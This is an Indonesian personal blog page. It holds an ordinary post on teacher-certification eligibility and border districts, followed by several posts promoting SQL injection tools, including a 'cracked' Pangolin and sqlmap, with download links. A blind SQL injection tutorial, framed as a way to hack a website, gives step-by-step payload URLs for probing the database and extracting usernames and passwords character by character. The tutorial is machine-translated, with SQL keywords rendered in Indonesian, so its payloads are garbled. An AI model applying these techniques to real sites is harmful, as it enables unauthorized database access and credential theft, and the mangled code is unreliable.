Sabtu, 19 Mei 2012

Informasi Calon Peserta Sertifikasi Guru

Persyaratan Peserta

  1. Guru yang masih aktif mengajar di sekolah di bawah binaan Kementerian Pendidikan dan Kebudayaan.
  2. Memiliki kualifikasi akademik sarjana (S-1) atau diploma empat (D-IV) dari program studi yang terakreditasi atau minimal memiliki izin penyelenggaraan.
  3. Guru yang diangkat dalam jabatan pengawas dengan ketentuan:
    • bagi pengawas satuan pendidikan selain dari guru yang diangkat sebelum berlakunya Peraturan Pemerintah Nomor 74 Tahun 2008 tentang Guru (1 Desember 2008), atau
    • bagi pengawas selain dari guru yang diangkat setelah berlakunya Peraturan Pemerintah Nomor 74 Tahun 2008 tentang Guru harus pernah memiliki pengalaman formal sebagai guru.
  4. Guru bukan PNS pada sekolah swasta yang memiliki SK sebagai guru tetap dari penyelenggara pendidikan (guru tetap yayasan), sedangkan guru bukan PNS pada sekolah negeri harus memiliki SK pengangkatan sebagai guru dari Bupati/Walikota.
  5. Sudah menjadi guru pada saat Undang-Undang Nomor 14 Tahun 2005 tentang Guru dan Dosen ditetapkan (30 Desember 2005).
  6. Pada tanggal 1 Januari 2013 belum memasuki usia 60 tahun.
  7. Memiliki nomor unik pendidik dan tenaga kependidikan (NUPTK).
  8. Guru dan guru yang diangkat dalam jabatan pengawas satuan pendidikan yang BELUM memiliki kualifikasi akademik S-1/D-IV apabila:
    • pada 1 Januari 2012 sudah mencapai usia 50 tahun dan mempunyai pengalaman kerja 20 tahun sebagai guru, atau
    • mempunyai golongan IV/a atau memenuhi angka kredit kumulatif setara dengan golongan IV/a (dibuktikan dengan SK kenaikan pangkat).

Urutan Rangking Calon Peserta

Daftar calon peserta sertifikasi guru yang ditampilkan sesuai dengan data yang tersimpan dalam data NUPTK yang telah diperbaiki sampai dengan tanggal 1 Desember 2011 dan diurutkan berdasar kriteria berturut turut:

  1. Usia.Usia dihitung berdasarkan tanggal, bulan, dan tahun kelahiran yang tercantum dalam akta kelahiran atau bukti lain yang sah.
  2. Masa Kerja.Masa kerja dihitung sejak yang bersangkutan bekerja sebagai guru baik sebagai PNS maupun bukan PNS.
  3. GolonganPangkat/golongan adalah pangkat/golongan terakhir yang dimiliki guru saat dicalonkan sebagai peserta sertifikasi guru. Kriteria ini adalah khusus untuk guru PNS atau guru bukan PNS yang telah memiliki SK Inpassing.

Prioritas Mengisi Kuota

Guru yang dapat langsung masuk mengisi kuota sertifikasi guru adalah sebagai berikut.

  • Semua guru yang diangkat dalam jabatan pengawas yang memenuhi persyaratan dan belum memiliki sertifikat pendidik.
  • Guru dan kepala sekolah berprestasi peringkat 1 tingkat provinsi atau peringkat 1, 2, dan 3 tingkat nasional, atau guru yang mendapat penghargaan internasional yang belum mengikuti sertifikasi guru dalam jabatan pada tahun 2007 s.d 2011.
  • Semua guru yang mengajar di daerah perbatasan, terdepan, terluar yang memenuhi persyaratan.

Daftar Daerah Perbatasan dan Pulau Kecil Terluar

(Sumber data dari RPJM 2010-2014 Bappenas, 17 Desember 2009 dan Update data Bappenas, 15 Januari 2010)
NoPropinsiKabupaten/KotaKecamatan
1.N A D1.1Kota Sabang1.Suka Jaya




2.Suka Karya
2.Sumatera Utara2.1.Kab. Serdang Bedagai1.Bandar Khalifa




2.Tanjung Beringin




3.Teluk Mengkudu
3.Riau3.1.Kab. Bengkalis1.Bengkalis




2.Rupat Utara


3.2.Kab. Indragiri Hilir1.Keteman




2.Pulau Burung


3.3.Kab. Rokan Hilir1.Kubu




2.Sinaboi




3.Pasirlimau Kapuas


3.4.Kota Dumai1.Sungai Sembilan


3.5.Kab. Kep. Meranti1.Rangsang Barat
4.Kalimantan Barat4.1.Kab. Sambas1.Paloh




2.Sajingan Besar


4.2.Kab. Sintang1.Ketungau Hulu




2.Ketungau Tengah


4.3.Kab. Kapuas Hulu1.Badau




2.Batang Lupar




3.Embaloh Hulu




4.Empanang




5.Puring Kencana




6.Puttussibau Selatan




7.Puttussibau Utara


4.4.Kab. Bengkayang1.Jagoi Babang




2.Siding


4.5.Kab. Sanggau1.Entikong




2.Sekayam
5.Kalimantan Timur5.1.Kab. Malinau1.Kayan Hilir




2.Kayan Hulu


5.2.Kab. Nunukan1.Krayan




2.Krayan Selatan




3.Lumbis




4.Nunukan




5.Sebatik




6.Sebuku




7.Sebakung


5.3.Kab. Kutai Barat1.Long Apari




2.Long Pahangai
6.Sulawesi Utara6.1.Kab. Sangihe1.Kandahe




2.Manganittu




3.Tabukan Selatan




4.Tabukan Utara




5.Tamako


6.2.Kab. Kepulauan Talaud1.Beo




2.Essang




3.Kabaruan




4.Karatung




5.Khusus Miangas




6.Lirung




7.Nanusa




8.Rainis
7.Maluku7.1.Kab. Maluku Tenggara Barat1.Kormomolin




2.Nirunmas




3.Selaru




4.Tinimbar Selatan




5.Tinimbar Utara




6.Wermaktian




7.Wertamian




8.Wuarlabobar




9.Yaru


7.2.Kab. Maluku Barat Daya1.Babar Timur




2.Letimoa Lakor




3.Mdona Heira




4.P.P. Babar




5.Terselatan




6.Wetar


7.3.Kab. Kep. Aru1.Aru Selatan




2.Aru Selatan Timur




3.Aru Tengah




4.Aru Tengah Selatan




5.Aru Tengah Timur




6.Aru Utara




7.P.P. Aru
8.NTT8.1.Kab. Kupang1.Amfaong Timur


8.2.Kab. Timor Tengah Utara1.Insana




2.Insana Utara




3.Miaomaffo Barat




4.Miaomaffo Timur


8.3.Kab. B E L U1.Kakuluk Mesek




2.Kobalima




3.Kobalima Timur




4.Lamaknen




5.Lamaknen Selatan




6.Lasiolat




7.Ringhat




8.Tasifeto Timur




9.Tasipeto Barat


8.4.Kab. A L O R1.Alor Barat Daya




2.Alor Barat Laut




3.Alor Selatan




4.Alor Timur




5.Pantar




6.Teluk Mutiara


8.5.Kab. Rote Ndao1.Rote Barat Daya
9.Papua9.1.Kab. Merauke1.Eligobel




2.Merauke




3.Nauken Jarai




4.Sota




5.Ulilin




6.Kimaam


9.2.Kab. Keerom1.Arso




2.Senggi




3.Towe




4.Waris




5.Web


9.3.Kab. Boven Digul1.Jair




2.Mindiptana




3.Ninati




4.Waropko


9.4.Kab. Pegunungan Bintang1.Batom




2.Iwur




3.Kiwirok




4.Kiwirok Timur




5.Okbibab




6.Oksibil




7.Tinibil 1




8.Tinibil 2


9.5.Kab. Supiori1.Supiori Utara


9.6.Kota. Jayapura1.Muara Tami
10.Maluku Utara10.1.Kab. Morotai1.Morotai Jaya




2.Morotai Selatan




3.Morotai Selatan Barat




4.Morotai Timur.




5.Morotai Utara
11.Kepulauan Riau11.1.Kab. Natuna1.Bunguran Timur




2.Bunguran Utara




3.Pulau Laut




4.Serasan




5.Subi


11.2.Kab. Anambas1.Siantan


11.3.Kab. Bintan1.Bintan Pesisir


11.4.Kab. Karimun1.Tebing


11.5.Kota Batam1.Belakang Padang




2.Nongsa
12.Papua Barat12.1.Kab. Raja Ampat1.Kep. Ayau




2.Waigeo Utara

Guru

  1. Cek dalam daftar calon peserta menggunakan tombol pencarian dengan memasukkan NUPTK
  2. Jika nama Anda termasuk dalam daftar calon peserta segera hubungi dinas pendidikan setempat untuk mendapatkan Format A0
  3. Mengoreksi dan memperbaiki data pada Format A0 (data ini tidak boleh salah karena kemudian akan digunakan sebagai acuan untuk sertifikat pendidik) Data yang dikoreksi adalah nama lengkap harus sesuai dengan dokumen lainnya (ijasah atau SK PNS); golongan (bagi PNS); tempat dan tanggal lahir; ijasah, tahun lulus, dan nama perguruan tinggi; nama sekolah tempat mengajar. Dokumen yang dijadikan acuan verifikasi nama dan tempat tanggal lahir peserta bagi guru PNS adalah SK PNS, sedangkan bagi guru bukan PNS adalah ijasah terakhir dari perguruan tinggi.
  4. Mengisi pola sertifikasi yang dipilih.
    • Pola portofolio bagi guru yang memiliki dan memenuhi skor minimal portofolio (kuota maksimal 1%).
    • Pola PLPG bagi guru yang tidak memenuhi skor minimal portofolio.
    • Pola pemberian sertifikat secara langsung (PSPL) bagi guru yang telah memenuhi syarat PSPL.
  5. Menetapkan bidang studi yang akan disertifikasi Bidang studi tersebut harus ditetapkan sendiri oleh guru yang bersangkutan sesuai dengan kompetensi yang dikuasainya. Harus disadari oleh guru bahwa bidang studi ini akan terus melekat dalam tugas mengajar yang akan dilaksanakan oleh guru selama guru tersebut mengajar. Dengan kata lain, guru harus konsisten dengan pilihannya secara profesional karena guru harus mengajarkan bidang studi atau mata pelajaran tersebut selama bertugas sebagai guru.
    Penetapan bidang studi sertifikasi mengikuti ketentuan sebagai berikut:
    • sesuai dengan program studi S-1 (linier),
    • apabila tidak sesuai (tidak linier) dengan program studi S-1, dapat menggunakan program studi D-III,
    • apabila tidak sesuai (tidak linier) dengan program studi S-1 dan program studi D-III, guru dapat menetapkan bidang studi yang serumpun dengan program studi S-1 dan D-III,
    • apabila tidak sesuai (tidak linier) dengan program studi S-1 dan program studi D-III, guru dapat menetapkan bidang studi sertifikasi sesuai dengan mata pelajaran, rumpun mata pelajaran, atau satuan pendidikan yang diampunya, dan harus memiliki masa kerja minimal sudah 5 tahun berturut-turut mengajar mata pelajaran tersebut.
  6. Mengumpulkan berkas/dokumen/portofolio ke Dinas Pendidikan Kabupaten/Kota
    • Pola PSPL 
    •  

      Dokumen yang harus dikumpulkan untuk Pola PSPL

      Untuk guru yang berkualifikasi akademik S-2/S-3 dan sekurang-kurangnya golongan IV/b.

      1. Format A1 yang telah ditandatangani oleh LPMP.
      2. Fotokopi ijazah S-1/D-IV, fotokopi ijazah dan transkrip nilai S-2 dan/atau S-3 yang telah dilegalisasi (kecuali Ijazah S-3 by research). Ijazah dari perguruan tinggi negeri dilegalisasi oleh perguruan tinggi yang mengeluarkan, untuk ijazah dari perguruan tinggi swasta dilegalisasi oleh kopertis wilayah perguruan tinggi yang mengeluarkan ijazah, dan untuk ijazah dari luar negeri dilampiri fotokopi surat keterangan akreditasi dari Direktorat Jenderal Pendidikan Tinggi.
      3. Fotokopi tugas belajar/izin belajar atau surat keterangan tugas belajar dari pejabat berwenang yang telah dilegalisasi oleh atasan langsung.
      4. Fotokopi SK pangkat/golongan terakhir (minimal IV/b) yang telah dilegalisasi oleh atasan langsung.
      5. Fotokopi SK mengajar (SK pembagian tugas mengajar) terakhir yang telah dilegalisasi oleh atasan langsung.
      6. Surat rekomendasi dari dinas pendidikan kabupaten/kota atau dinas pendidikan provinsi untuk guru PLB.
      7. Pasfoto terbaru berwarna (enam bulan terakhir dan bukan polaroid) ukuran 3x4 cm sebanyak 4 lembar, di bagian belakang setiap pasfoto ditulis identitas peserta (nama, nomor peserta, dan satminkal).
      Untuk Guru yang memiliki golongan serendah-rendahnya IV/c

      1. Format A1 yang telah ditandatangani oleh LPMP.
      2. Fotokopi ijazah pendidikan terakhir yang telah dilegalisasi. Fotokopi ijazah dari perguruan tinggi dilegalisasi oleh perguruan tinggi yang mengeluarkan, fotokopi ijazah dari perguruan tinggi swasta yang sudah tidak beroperasi dilegalisasi oleh kopertis, dan fotokopi ijazah dari luar negeri dilampiri fotokopi surat keterangan akreditasi dari Direktorat Jenderal Pendidikan Tinggi. Ijazah SLTA dilegalisasi oleh sekolah yang mengeluarkan ijazah.
      3. Fotokopi SK pangkat/golongan IV/c yang telah dilegalisasi oleh atasan langsung.
      4. Fotokopi SK mengajar (SK pembagian tugas mengajar) terakhir yang telah dilegalisasi oleh atasan langsung.
      5. Surat rekomendasi dari dinas pendidikan kabupaten/kota atau dinas provinsi khusus untuk guru PLB.
      6. Pasfoto terbaru berwarna (enam bulan terakhir dan bukan polaroid) ukuran 3x4 cm sebanyak 4 lembar, di bagian belakang setiap pasfoto ditulis identitas peserta (nama, nomor peserta, dan satminkal).
    • Pola PF mengumpulkan Portofolio
    •  

      Pola PF mengumpulkan Portofolio

      Peserta pola PF menyusun portofolio sebanyak dua rangkap sesuai urutan sebagai berikut.
      1. Halaman sampul disisipkan Format A1
      2. Daftar isi
      3. Instrumen portofolio, yang meliputi: (a) identitas peserta dan pengesahan, dan (b) komponen portofolio yang telah diisi.
      4. Bukti fisik atau portofolio meliputi komponen sebagai berikut.
        • Kualifikasi Akademik
        • Pendidikan dan Pelatihan
        • Pengalaman Mengajar
        • Perencanaan dan Pelaksanaan Pembelajaran
        • Penilaian dari Atasan dan Pengawas
        • Prestasi Akademik
        • Karya Pengembangan Profesi
        • Keikutsertaan dalam Forum Ilmiah
        • Pengalaman Menjadi Pengurus Organisasi di Bidang Kependidikan dan Sosial
        • Penghargaan yang Relevan dengan Bidang Pendidikan
      5. Dilengkapi dengan pasfoto terbaru berwarna (enam bulan terakhir dan bukan polaroid) ukuran 3x4 cm sebanyak 4 lembar, di bagian belakang setiap pasfoto ditulis identitas peserta (nama, nomor peserta, dan satminkal).
      Penjelasan lengkap tentang portofolio dapat dilihat pada Buku 3.
    • Pola PLPG
    •  

      Peserta PLPG Mengumpulkan Berkas

      Peserta yang memilih pola PLPG secara langsung harus menyerahkan berkas sebagai berikut.
      1. Format A1 yang telah ditandatangani oleh LPMP.
      2. Fotokopi Ijazah S-1 atau D-IV, serta Ijazah S-2 dan atau S-3 (bagi yang memiliki) dan disahkan oleh perguruan tinggi yang mengeluarkan,
      3. Fotokopi SK pangkat/golongan terakhir yang telah dilegalisasi oleh atasan langsung (bagi PNS)
      4. Fotokopi SK pengangkatan sebagai guru sejak pertama menjadi guru sampai dengan SK terakhir yang disahkan oleh pejabat terkait,
      5. Fotokopi SK mengajar dari Kepala Sekolah yang disahkan oleh atasan, dan
      6. Pasfoto terbaru berwarna (enam bulan terakhir dan bukan polaroid) ukuran 3x4 cm sebanyak 4 lembar, di bagian belakang setiap pasfoto ditulis identitas peserta (nama, nomor peserta, dan satminkal).
  7. Memantau proses penetapan peserta melalui website www.sergur.pusbangprodik.org
  8. Menerima Format A1 berisi nomor peserta sebagai bukti terdaftar sebagai peserta sertifikasi guru
  9. Mencari informasi tentang pelaksanaan uji kompetensi awal (bagi peserta PLPG) ke Dinas Pendidikan Kabupaten/Kota masing-masing.

Donlot Aja :
PLPG_1_Cover.pdf
[176.3 KB]

 

PLPG_2_Pengantar-Sambutan-Dftr isi.pdf
[498.69 KB]

 

PLPG_3_isi.pdf
[1.95 MB]

HONOR JANGAR - Informasi Calon Peserta Sertifikasi Guru

Kamis, 17 Mei 2012

Pangolin [ Otomatis SQL Injection & Alat PenTesting ]

[Image]

Pangolin: 
[ Otomatis SQL Injection & Alat PenTesting ]

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7aummCMwvZaDcZ2ed-_RbjNaGAV97dpv-oa1ZEfwOkDGfGM3PUfSDrCsDTfNYIr06MWC0OX2dyw88EbDRqldUYDn_PbTFbKxs1QoC2SsiZrLo4eKNgRYyRGRFlT66vNq2N3KogPE4M2o/s1600/Pangolin_screenshot_612x472.jpg
 
Pangolin adalah injeksi SQL penetrasi otomatis pengujian alat yang dikembangkan oleh NOSEC. Tujuannya adalah untuk mendeteksi dan mengambil keuntungan dari kerentanan SQL injection pada aplikasi web. Setelah mendeteksi satu atau lebih suntikan SQL pada host target, pengguna dapat memilih di antara berbagai pilihan untuk melakukan back-end database yang luas sidik jari sistem manajemen, mengambil DBMS pengguna sesi dan database, pengguna menyebut satu persatu, hash password, hak istimewa, database , dump seluruh atau spesifik pengguna DBMS tabel / kolom, jalankan SQL pernyataan sendiri, membaca file tertentu pada sistem file dan banyak lagi.
Basis Dukungan

    
Akses: Informasi (Path database; Jalan Akar, Driver); data
    
MSSQL: Informasi; Data; FileReader; RegReader; FileWriter; cmd; DirTree
    
MySql: Informasi; Data; FileReader; FileWriter;
    
Oracle: Inforatmions (Versi; IP, Database; Account ......); data, dan setiap orang lain;
    
Informix: Informatons; data
    
DB2: Informatons; data, dan lebih;
    
Sybase: Informatons; data, dan lebih;
    
PostgreSQL: Informatons; Data; FileReader;
    
Sqlite: Informatons; data
Saat ini, sebagian besar fungsi diarahkan pada MSSQL dan MySql digabungkan dengan Oracle dan Access. Perusahaan kecil dan menengah lainnya menggunakan DB2, Informix, Sybase, PostgreSQL, serta Sqlite yang tidak begitu umum. 


Download di sini:
PowerTool
Download Versi Terbaru
 Cracked
PowerTool
[Image]
HONOR JANGAR - Pangolin [ Otomatis SQL Injection & Alat PenTesting ]

SQLmap



Hack SQLi Vulnrable Website dengan SQLmap
 Sqlmap adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih dari server database. Muncul dengan mesin deteksi kick-ass, fitur ceruk banyak untuk penguji penetrasi akhir dan berbagai switch yang berlangsung dari sidik jari database, mengambil atas data dari database, untuk mengakses sistem file yang mendasari dan mengeksekusi perintah pada sistem operasi melalui out-of-band koneksi. 

Donlot Langsung :
PowerTool
HONOR JANGAR - SQLmap

Pangolin Professinal versi USB

[Image]

Pangolin Professinal  
edisi V 
usb 3.2.1.1021
     1-Dukungan Microsoft SQL Server 2008; 2010
     2.Improved SQL Injection untuk MySQL. Dukungan Unhex fungsi mendeteksi ().
     3.New menambahkan Scan-> Perpanjang Scan modus. Optimalkan kemampuan untuk Inject.

Donlot Langsung :
PowerTool
[Image]
HONOR JANGAR - Pangolin Professinal versi USB

Portable Pangolin Professinal

 

Pangolin
[ Edition 3.2.4.1132 full version ]

Pangolin adalah pengujian penetrasi, SQL Injection uji alat pada keamanan database. Ia menemukan vulnerabitlities SQL Injection.
Tujuannya adalah untuk mendeteksi dan mengambil keuntungan dari kerentanan SQL injection pada aplikasi web. Setelah mendeteksi satu atau
suntikan lebih SQL pada host target, pengguna dapat memilih di antara berbagai pilihan untuk melakukan back-end database yang luas
sidik jari sistem manajemen, mengambil DBMS pengguna sesi dan database, pengguna menyebut satu persatu, hash password, hak istimewa, database,
membuang seluruh atau pengguna "s tabel tertentu DBMS / kolom, jalankan SQL pernyataan sendiri, membaca file tertentu pada sistem file dan banyak lagi.
Trenggiling rilis catatan:
1. Meningkatkan kemampuan untuk Inject.
2. Ditingkatkan Auto-penelaahan akurasi Keywords fungsi.
3. Tambahkan kemampuan untuk auto meja dump dan kolom. (Fungsi ini tidak akan kembali membuang data bila data yang ada dalam tampilan Tabel).
4. Masalah tetap kacau Auto-penelaahan Keywords ketika SQL Injection lebah titik dimuat.
5. Tetap http header "Content-Length" masalah. Auto menghapus parameter ini.
6. Tetap masalah pandang Tabel.
7. Tetap masalah beban dari.
8. Tetap masalah Injection Cookie ketika dihargai berisi "=". 
Download Langsung :

PowerTool
PowerTool
HONOR JANGAR - Portable Pangolin Professinal

Blind SQLi



Mari kita kemon,ok kita cekibrot!!!
Misalkan Itu Anda ingin Hack Website ini dengan Blind SQLi
http://site.com/index.php?id=5
ketika kita menjalankan ini, kita melihat beberapa halaman dan artikel di halaman tersebut, gambar dll ...
maka ketika kita ingin menguji untuk serangan injeksi sql buta
http://www.jangar.com/index.php?id=5 dan 1 = 1 <--- ini selalu benar dan beban halaman normal, itu ok. sekarang tes yang sesungguhnya
http://www.site.com/index.php?id=5 dan 1 = 2 <--- ini adalah palsu jadi jika beberapa teks, gambar atau beberapa konten yang hilang pada halaman kembali maka situs yang vulrnable untuk injeksi sql buta.
1) Dapatkan versi MySQL untuk mendapatkan versi dalam serangan buta kita gunakan substring i.e http://www.jangar.com/index.php?id=5 dan substring (@ @ version, 1,1) = 4 ini harus kembali TRUE jika versi MySQL adalah 4. ganti 4 dengan 5, dan jika query mengembalikan TRUE maka versi adalah 5. i.e http://www.jangar.com/index.php?id=5 dan substring (@ @ version, 1,1) = 5 2) Uji jika subselect bekerja ketika pilih tidak bekerja maka kita gunakan subselect i.e http://www.jangar.com/index.php?id=5 dan (pilih 1) = 1 jika load halaman secara normal maka subselects kerja. maka kita akan melihat apakah kita memiliki akses ke mysql.user i.e http://www.jangar.com/index.php?id=5 dan (pilih 1 dari batas mysql.user 0,1) = 1 jika beban halaman biasanya kita memiliki akses ke mysql.user dan kemudian kita bisa menarik beberapa load_file sandi usign () fungsi dan OUTFILE. 3). Memeriksa nama-nama tabel dan kolom Ini adalah bagian ketika menebak adalah teman terbaik :) yaitu http://www.jangar.com/index.php?id=5 dan (pilih 1 dari batas pengguna 0,1) = 1 (Dengan batas 0,1 query kita disini mengembalikan 1 baris data, menyebabkan subselect mengembalikan hanya 1 baris, ini sangat penting.) maka jika beban halaman normal tanpa isi hilang, meja pengguna keluar. jika Anda mendapatkan FALSE (beberapa artikel hilang), hanya mengubah nama tabel sampai Anda menebak yang benar :) katakanlah bahwa kami telah menemukan bahwa nama tabel adalah pengguna, sekarang apa yang kita butuhkan adalah kolom nama. sama dengan nama tabel, kita mulai menebak-nebak. Seperti saya katakan sebelumnya mencoba umum nama untuk kolom. i.e http://www.jangar.com/index.php?id=5 dan (substring pilih (concat (1, password), 1,1) dari batas pengguna 0,1) = 1 jika halaman beban biasanya kita tahu bahwa nama kolom adalah password (jika kita mendapatkan palsu kemudian mencoba nama-nama umum atau hanya menebak) di sini kita menggabungkan 1 dengan password kolom, kemudian substring kembali yang pertama karakter (, 1,1) 4). Tarik data dari database kami menemukan pengguna meja saya kolom username password jadi kita akan menarik karakter dari itu. http://www.jangar.com/index.php?id=5 dan ascii (substring ((SELECT concat (Username, 0x3a, password) dari pengguna batas 0,1), 1,1))> 80 ok ini di sini menarik karakter pertama dari pengguna pertama dalam tabel users. substring disini akan mengembalikan karakter pertama dan 1 karakter panjangnya. ascii () mengkonversi bahwa 1 karakter ke nilai ascii dan kemudian membandingkannya dengan simbol lebih besar maka>. jadi jika ascii char lebih besar maka 80, halaman sudah terbuka secara normal. (TRUE) kami terus mencoba sampai kita mendapatkan palsu. http://www.jangar.com/index.php?id=5 dan ascii (substring ((SELECT concat (Username, 0x3a, password) dari pengguna batas 0,1), 1,1))> 95 kita mendapatkan TRUE, tetap incrementing http://www.jangar.com/index.php?id=5 dan ascii (substring ((SELECT concat (Username, 0x3a, password) dari pengguna batas 0,1), 1,1))> 98 BENAR lagi, lebih tinggi http://www.jangar.com/index.php?id=5 dan ascii (substring ((SELECT concat (Username, 0x3a, password) dari pengguna batas 0,1), 1,1))> 99 SALAH! jadi karakter pertama dalam username adalah char (99). Menggunakan converter ascii kita tahu bahwa char (99) adalah huruf 'c'. kemudian mari kita memeriksa karakter kedua. http://www.site.com/index.php?id=5 dan ascii (substring ((SELECT concat (Username, 0x3a, password) dari pengguna batas 0,1), 2,1))> 99 Perhatikan bahwa saya berubah, 1,1 untuk, 2,1 untuk mendapatkan karakter kedua. (Sekarang mengembalikan karakter kedua, 1 karakter di lenght) http://www.jangar.com/index.php?id=5 dan ascii (substring ((SELECT concat (Username, 0x3a, password) dari pengguna batas 0,1), 1,1))> 99 TRUE, halaman beban normal, lebih tinggi. http://www.jangar.com/index.php?id=5 dan ascii (substring ((SELECT concat (Username, 0x3a, password) dari pengguna batas 0,1), 1,1))> 107 SALAH nomor, lebih rendah. http://www.jangar.com/index.php?id=5 dan ascii (substring ((SELECT concat (Username, 0x3a, password) dari pengguna batas 0,1), 1,1))> 104 TRUE, lebih tinggi. http://www.jangar.com/index.php?id=5 dan ascii (substring ((SELECT concat (Username, 0x3a, password) dari pengguna batas 0,1), 1,1))> 105 SALAH! kita tahu bahwa karakter kedua adalah char (105) dan itu adalah 'i'. Kami memiliki 'Ci' sejauh jadi ingatlah incrementing sampai Anda mendapatkan akhir. (Bila> 0 returns false kita tahu bahwa kita harus mencapai bagian akhir). Ada beberapa alat untuk Blind SQL Injection, saya pikir sqlmap adalah yang terbaik, tapi aku melakukan semuanya secara manual, menyebabkan yang membuat Anda lebih baik SQL INJECTOR: D Harap Anda belajar sesuatu dari tutorial ini. 

Donlot noh ga 
PowerTool
HONOR JANGAR - Blind SQLi

Addons Fox Tamper Data


Tamper Data
PowerTool
Donlot cara menggunakannya nieh :
 PowerTool
 PowerTool
PowerTool
PowerTool
HONOR JANGAR - Addons Fox Tamper Data

.

.
Template by : kendhin Honor Jangar